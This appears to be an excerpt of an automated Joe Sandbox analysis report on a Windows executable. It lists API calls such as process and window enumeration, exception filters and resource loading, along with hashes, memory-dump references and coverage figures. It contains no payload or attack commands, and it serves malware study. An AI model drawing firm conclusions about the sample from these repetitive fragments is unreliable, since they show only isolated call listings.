                                                • Instruction ID: 384b602530dd3e7abee933e9cb9e54516736a920c6d3bdd50a0cb6d10c4ed17f
                                                • Opcode Fuzzy Hash: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                • Instruction Fuzzy Hash: E3415F74A0421D9FCB60EF59C885ED9B3B4EB48304F5085AAE808D7351DB34AE85CF95
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00003A8C), ref: 00424B33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00024A8C), ref: 00424B33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                • API String ID: 1646373207-3712701948
                                                • Opcode ID: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                • Opcode Fuzzy Hash: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                • API String ID: 1646373207-3712701948
                                                • Opcode ID: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                • Opcode Fuzzy Hash: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                APIs
                                                • FindWindowA.USER32(00000000,?), ref: 004E6F81
                                                  • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E6F32
                                                  • Part of subcall function 004CF608: Process32Next.KERNEL32(00000000,?), ref: 004CF619
                                                • EnumWindows.USER32(004E6C44,?), ref: 004E70AC
                                                  • Part of subcall function 004CF5E8: Process32First.KERNEL32(00000000,00000128), ref: 004CF5F9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E709E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateEnumFindFirstNextSnapshotToolhelp32WindowWindows
                                                • String ID:
                                                • API String ID: 180456925-0
                                                • Opcode ID: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                • Instruction ID: 72b661b911529101ae542200eb1df53ac65a5c9b4dd6d11e1212abbbfab87a01
                                                • Opcode Fuzzy Hash: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                • Instruction Fuzzy Hash: A9A1B2347003598BCB21EF5AD881BEFB3B6EF54359F5045AAE80497345DB3CEE458A88
                                                APIs
                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00431F63
                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00431F7F
                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00431FF6
                                                • VariantClear.OLEAUT32(?), ref: 0043201F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                • String ID:
                                                • API String ID: 920484758-0
                                                • Opcode ID: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                • Instruction ID: f3952d494a17d4f816fc107e6549c8048cd253aa9e54a2e5d839202b9fdd8af3
                                                • Opcode Fuzzy Hash: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                • Instruction Fuzzy Hash: 45411E75A0021D9FCB61DB59CC91BC9B3BCAF4C314F0051DAE549A7222DB38AF858F58
                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                • Opcode Fuzzy Hash: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                • Opcode Fuzzy Hash: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                APIs
                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                  • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocaleStringThreadType
                                                • String ID:
                                                • API String ID: 1505017576-0
                                                • Opcode ID: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                • Opcode Fuzzy Hash: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                APIs
                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                  • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocaleStringThreadType
                                                • String ID:
                                                • API String ID: 1505017576-0
                                                • Opcode ID: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                • Opcode Fuzzy Hash: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                APIs
                                                • FindResourceA.KERNEL32(?,?,?), ref: 0043E8A3
                                                • LoadResource.KERNEL32(?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8BD
                                                • SizeofResource.KERNEL32(?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8D7
                                                • LockResource.KERNEL32(0043E5F4,00000000,?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                • Instruction ID: 1ca1a7a9c485ca756b6cf2f32b2eaf6a8b809140a0052c2abd4bb8ac9ed98deb
                                                • Opcode Fuzzy Hash: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                • Instruction Fuzzy Hash: C8F06DB2606614AF5708EEAEA881D5B77DCDE88364720016FF918C7246DA39DD0183BC
                                                APIs
                                                • GlobalHandle.KERNEL32 ref: 00428CD3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$AllocHandleLockUnlock
                                                • String ID:
                                                • API String ID: 2167344118-0
                                                • Opcode ID: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                • Instruction ID: d653ff63ed22f6af050254ba5540b1362e96b0375665dbbf2afb4746ab74a42f
                                                • Opcode Fuzzy Hash: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                • Instruction Fuzzy Hash: 44B002D4B922307DB90433B6EC0BD3F115C9D947097C44A5E7500D2086DC7D9C22407D
                                                APIs
                                                • GlobalHandle.KERNEL32 ref: 00428CD3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$AllocHandleLockUnlock
                                                • String ID:
                                                • API String ID: 2167344118-0
                                                • Opcode ID: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                • Instruction ID: 1176041c58d3c6c4e80ae864809d48ff9bb0580384c2a0d59c617645fccee574
                                                • Opcode Fuzzy Hash: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                • Instruction Fuzzy Hash: 2FB009D4A922307CB90433B2EC0BE3F211CAC9470A7C48A8E7500E2086DC7DA822807E
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: PR$ SE$4$W
                                                • API String ID: 0-2834725127
                                                • Opcode ID: cc2ab1422b48e366c2156ab7bf504be634b04cadd4cdc41852e91440b3b62cc4
                                                • Instruction ID: de84d66766f4911dbb4cb6dd5687d3048455578843a01c8ac6cd267dfc716551
                                                • Opcode Fuzzy Hash: cc2ab1422b48e366c2156ab7bf504be634b04cadd4cdc41852e91440b3b62cc4
                                                • Instruction Fuzzy Hash: C0F1FAB1901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: RO$C$Once$Start
                                                • API String ID: 0-2962527757
                                                • Opcode ID: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                • Opcode Fuzzy Hash: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DateFormatLocaleThread
                                                • String ID: yyyy
                                                • API String ID: 3303714858-3145165042
                                                • Opcode ID: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                • Opcode Fuzzy Hash: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DateFormatLocaleThread
                                                • String ID: yyyy
                                                • API String ID: 3303714858-3145165042
                                                • Opcode ID: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                • Opcode Fuzzy Hash: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                • API String ID: 0-1311169778
                                                • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4

                                                Execution Graph

                                                Execution Coverage:3.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:215
                                                Total number of Limit Nodes:10
